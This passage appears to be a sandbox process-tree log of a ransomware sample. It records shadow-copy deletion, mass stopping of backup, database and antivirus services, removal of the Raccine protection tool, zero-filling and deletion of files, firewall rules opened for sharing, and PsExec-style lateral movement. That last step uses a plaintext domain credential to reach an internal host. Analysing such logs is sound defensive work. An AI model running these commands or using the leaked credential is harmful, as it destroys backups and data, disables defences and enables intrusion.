  - Interacts with shadow copies
  PID:5600
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5772
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  PID:5180
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:5652
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:5476
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5208
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5912
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:5484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1668
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:6112
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.14 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:6104
- C:\Users\Admin\AppData\Local\Temp\c4i1vuzz.exe
  "C:\Users\Admin\AppData\Local\Temp\c4i1vuzz.exe" \10.10.0.14 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
  2⤵
  PID:5252
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:5284
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:4292
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5316
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:5056
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
  2⤵
  PID:5744
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:5564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:5560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:6032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:5252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:5784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:3976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:3592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:6136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:5364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:5748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:5500

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:2104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:4288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:4616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:3496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:2116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:2144

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:5300
- C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
  "2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
  2⤵
  PID:5440
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:4876
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:4604
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:4136
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4760
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:5328
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4344
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:4896
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5636
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4144
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4608
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:5972
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:4436
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5864
- - C:\Windows\system32\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:4732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:5312
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop mfefire /y
        5⤵
        
        PID:2200
- - C:\Windows\system32\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:5052
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:5032
- - C:\Windows\system32\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:4612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start Dnscache /y
      4⤵
      PID:4624
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:5788
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:4856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:4928
- - C:\Windows\system32\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:4476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:4168
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4908
- - C:\Windows\system32\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:4868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:4660
- - C:\Windows\system32\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:4164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:5460
- - C:\Windows\system32\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:5772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:5476
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:5660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:3876
- - C:\Windows\system32\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:4024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:5284
- - C:\Windows\system32\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:6140
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:5424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:3228
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:5620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:5800
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:5844
- - C:\Windows\system32\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:4044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:5300
- - C:\Windows\system32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:2308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:1312
- - C:\Windows\system32\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:5140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:3168
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:252
- - C:\Windows\system32\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:3440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:3592
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:1532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:5692
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:4308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:5740
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:5316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:5696
- - C:\Windows\system32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:4400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:6040
- - C:\Windows\system32\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:4880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:4132
- - C:\Windows\system32\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:4196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:4900
- - C:\Windows\system32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:4904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:5496
- - C:\Windows\system32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:5396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:6068
- - C:\Windows\system32\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:5492
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:5560
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:5128
- - C:\Windows\system32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:4492
- - C:\Windows\system32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:5472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:6108
- - C:\Windows\system32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:5332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:4988
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:4980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:5792
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:5324
- - C:\Windows\system32\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:6076
- - C:\Windows\system32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:4360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:4764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:6108
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TrueKeyScheduler /y
        5⤵
        
        PID:5552
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:3484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:5248
- - C:\Windows\system32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:4832
- - C:\Windows\system32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:5476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:280
- - C:\Windows\system32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:6136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:2568
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:6060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:5636
- - C:\Windows\system32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:3956
- - C:\Windows\system32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:4760
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:4384
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:5944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:5844
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop ShMonitor /y
        5⤵
        
        PID:2312
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:5040
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:5300
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:5240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:3716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:6032
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Health Service” /y
        5⤵
        
        PID:4280
- - C:\Windows\system32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:5424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:1176
- - C:\Windows\system32\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:4716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:2200
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:2276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:5924
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:5644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:5168
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:4720
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:6048
- - C:\Windows\system32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:5592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:6112
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:5856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:4296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:4332
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:4604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:4580
- - C:\Windows\system32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:5700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:4956
- - C:\Windows\system32\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:4648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:4992
- - C:\Windows\system32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:4952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:5024
- - C:\Windows\system32\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:4708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop macmnsvc /y
      4⤵
      PID:5128
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:1972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:5048
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:4860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:4236
- - C:\Windows\system32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:4800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:4864
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:4364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:4504
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:4188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:3876
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:2584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:4172
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:5324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:1968
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:5772
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:4804
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:2568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:4436
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:5180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:3228
- - C:\Windows\system32\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:5328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:5908
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5300
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:4180
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:4248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:5400
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:5296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:5324
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:4380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:5504
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:3192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:3592
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:5824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:5964
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:3672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:4676
- - C:\Windows\system32\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:5352
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:5920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:4132
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:4720
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:6036
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:5208
- - C:\Windows\system32\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:5384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:5912
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:4108
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:4668
- - C:\Windows\system32\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:4712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:4340
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:6068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:5024
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:4740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:4604
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:4780
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:4108
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:5592
- - C:\Windows\system32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:5128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:4828
- - C:\Windows\system32\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:4756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:6072
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:4128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:4844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:2200
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5856
- - C:\Windows\system32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:4944
